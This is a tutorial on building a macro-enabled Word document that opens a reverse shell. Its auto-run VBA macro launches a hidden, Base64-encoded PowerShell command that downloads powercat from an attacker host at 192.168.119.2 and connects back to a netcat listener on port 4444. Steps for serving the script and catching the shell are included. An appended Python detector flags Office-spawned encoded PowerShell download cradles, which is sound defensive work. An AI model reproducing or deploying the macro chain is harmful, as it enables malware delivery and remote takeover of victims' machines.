Leveraging Microsoft Word Macros for Reverse Shell

Published on June 5, 2025


This tutorial walks through embedding a malicious macro into a Word document, encoding a PowerShell payload, and serving it via a Python web server to establish a reverse shell.

1. Creating the Macro

Save the document as .doc or .docm. Go to View > Macros, name the macro MyMacro, and click "Create".

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

2. Encoding a PowerShell Payload

We’ll now Base64-encode the reverse shell command in PowerShell Core (pwsh) so that its special characters cause no quoting problems in the macro.

kali@kali:~$ pwsh
PowerShell 7.1.3
Type 'help' to get help.

PS> $Text = "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell"

PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText = [Convert]::ToBase64String($Bytes)
PS> $EncodedText

3. Splitting the Base64 in VBA

Use a Python script to split the encoded string:

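# Command line to split; the Base64 value is elided here
cmd = "powershell.exe -nop -w hidden -enc JABjAG..."
n = 50  # characters per chunk
for i in range(0, len(cmd), n):
    # Emit one VBA concatenation line per chunk
    print('Str = Str + "' + cmd[i:i+n] + '"')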

Then update the macro:

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc JABjAG..."
    ' Continue with chunks...
    CreateObject("Wscript.Shell").Run Str
End Sub

4. Python Web Server

Host powercat.ps1 with Python 3:

cd /path/to/powercat
python3 -m http.server 80

5. Listen for the Shell

Start a Netcat listener:

nc -nvlp 4444

Once the document is opened and macros are enabled, a reverse shell will connect back.
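Seen from the monitoring side, the chain above leaves a distinctive process-creation record: winword.exe starting powershell.exe with a Base64 -enc argument that decodes (as UTF-16LE, matching step 2) to a download cradle. The following is an added example, not part of the original tutorial, that triages such records; the event field names, the reason labels and the sample events are constructed assumptions, loosely modelled on process-creation logging.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Strings from the tutorial's payload that mark a download cradle (heuristic).
CRADLE_MARKERS = ("iex", "downloadstring", "net.webclient")
FLAG_RE = re.compile(r"\s[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)

def find_encoded(command_line):
    """Return (flag_present, decoded_script_or_None).
    PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...) and -ec."""
    for flag, value in FLAG_RE.findall(command_line):
        if "encodedcommand".startswith(flag.lower()) or flag.lower() == "ec":
            try:
                return True, base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:  # truncated log field or not valid Base64/UTF-16
                return True, None
    return False, None

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def analyze(event):
    """Return the list of reasons an event is suspicious (empty if none)."""
    if basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    reasons = []
    if basename(event["parent_image"]) in OFFICE_PARENTS:
        reasons.append("office-parent")
    found, script = find_encoded(event["command_line"])
    if found:
        reasons.append("encoded-command")
        if script is None:
            reasons.append("undecodable")
        elif any(m in script.lower() for m in CRADLE_MARKERS):
            reasons.append("download-cradle")
    return reasons

# Constructed sample data: placeholder URL on a documentation-only address.
SAMPLE_B64 = base64.b64encode(
    "IEX(New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/x.ps1')"
    .encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc " + SAMPLE_B64},
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]
if __name__ == "__main__":
    print([analyze(e) for e in SAMPLE_EVENTS])
```

An encoded command whose Base64 no longer decodes (for example because the log field was truncated) is still reported, with the reason "undecodable", so it is not silently dropped.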